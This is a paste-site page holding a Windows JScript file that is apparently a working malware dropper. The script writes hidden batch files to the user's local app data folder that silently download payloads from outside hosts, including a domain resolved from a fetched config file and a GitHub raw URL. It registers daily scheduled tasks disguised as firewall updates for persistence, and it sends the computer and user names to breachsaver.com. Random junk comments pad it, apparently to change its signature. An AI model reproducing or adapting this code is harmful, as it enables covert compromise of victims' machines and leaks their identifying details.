HTMLify

mj2otld9lb.js
Views: 2 | Author: amar
//YsCHpnZEhIOYt7svECQuP4JLCDyMoLczmCjVd4opdSNDtf5qqRXKjhPBsEmD3ZYmnMOeZEPqu0WUfbd8Ya5sj8aoVc0xwTjgceBVC1D7eOtA4LHOpExjCXy2vi3nql2hRYC8acnppybPJu7UeZoU6PwF8tsWpX205yRPq6BRa1envtgG48Z35kEQD8XRQ2crJqeswL
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var localAppData = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%");
var updateBatPath = localAppData + "\\update.bat";
var backupBatPath = localAppData + "\\backup.bat";
var firewallBatPath = localAppData + "\\firewall-update.bat";
function getRandom() {
    return Math.floor(Math.random() * 32768);
}
var procRev = shell.ExpandEnvironmentStrings("%PROCESSOR_REVISION%");
var username = shell.ExpandEnvironmentStrings("%USERNAME%");
var updateBatContent = "@echo off\n";
updateBatContent += "REM " + procRev + " " + getRandom() + " " + getRandom() + "  " + username + " " + username + " " + getRandom() + "  " + getRandom() + "\n";
updateBatContent += "start /min cmd /c PowerShell.exe -WindowStyle Hidden -Command \"$fpt = \\\"$env:LOCALAPPDATA\\\\firewallcomponents\\\"; $microsoft = 'dll3'; if (Test-Path $fpt) { $content = Get-Content $fpt -Raw; if ($content -match 'au=(.*)') { $microsoft = $matches[1].Trim() } }; $uri = \\\"http://$microsoft.org/in.mp3\\\"; $outFile = \\\"$env:LOCALAPPDATA\\\\backup.bat\\\"; Invoke-WebRequest -Uri $uri -OutFile $outFile\"\n";
updateBatContent += "REM " + procRev + " " + getRandom() + " " + getRandom() + "  " + username + " " + username + " " + getRandom() + "  " + getRandom() + "\n";
var updateBatFile = fso.CreateTextFile(updateBatPath, true);
updateBatFile.Write(updateBatContent);
updateBatFile.Close();
var firewallBatContent = "@echo off\n";
firewallBatContent += "REM " + procRev + " " + getRandom() + " " + getRandom() + "  " + username + " " + username + " " + getRandom() + "  " + getRandom() + "\n";
firewallBatContent += "start /min cmd /c PowerShell.exe -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/p-d3/s/refs/heads/main/R' -OutFile '%LOCALAPPDATA%\\firewallcomponents'\"\n";
firewallBatContent += "REM " + procRev + " " + getRandom() + " " + getRandom() + "  " + username + " " + username + " " + getRandom() + "  " + getRandom() + "\n";
var firewallBatFile = fso.CreateTextFile(firewallBatPath, true);
firewallBatFile.Write(firewallBatContent);
firewallBatFile.Close();
function createScheduledTask(taskName, taskTime, taskPath) {
    var command = 'SCHTASKS /Create /SC DAILY /TN "' + taskName + '" /TR "' + taskPath + '" /ST ' + taskTime + ' /RU "' + shell.ExpandEnvironmentStrings("%USERNAME%") + '" /F';
    shell.Run("cmd /c echo N | " + command, 0, true);
}
createScheduledTask("MyTasks\\1", "11:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\2", "11:06", '"' + backupBatPath + '"');
createScheduledTask("MyTasks\\3", "19:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\4", "19:06", '"' + backupBatPath + '"');
createScheduledTask("FirewallUpdate", "11:04", 'cmd.exe /C \\"' + firewallBatPath + '\\"');
createScheduledTask("FirewallUpdate1", "19:04", 'cmd.exe /C \\"' + firewallBatPath + '\\"');
var computerName = shell.ExpandEnvironmentStrings("%COMPUTERNAME%");
var userName = shell.ExpandEnvironmentStrings("%USERNAME%");
var url = "http://www.breachsaver.com/us.php?dl=windows-12&id=" + computerName + "_" + userName;
shell.Run("cmd /c start /min " + url, 0, false);
//EUThQpBww5A2lmwLIayChdrVnIIRwHLHpn43TVUY4QKahDdkyyRekGApObRueGH1uv454Tp1umkBgecgccyuZDzg0ZYBkGRvOUKsN1FrZ8F8SHx08kYHBQ7zb9IHAh0Pr8uvdOygx6mbt03pbZjltGkJLrisNgpiot47zs8ktzA4xPmwcZ9be3u5d08ceQg9rr1V9L
HTMLify

Share this file:

Comments
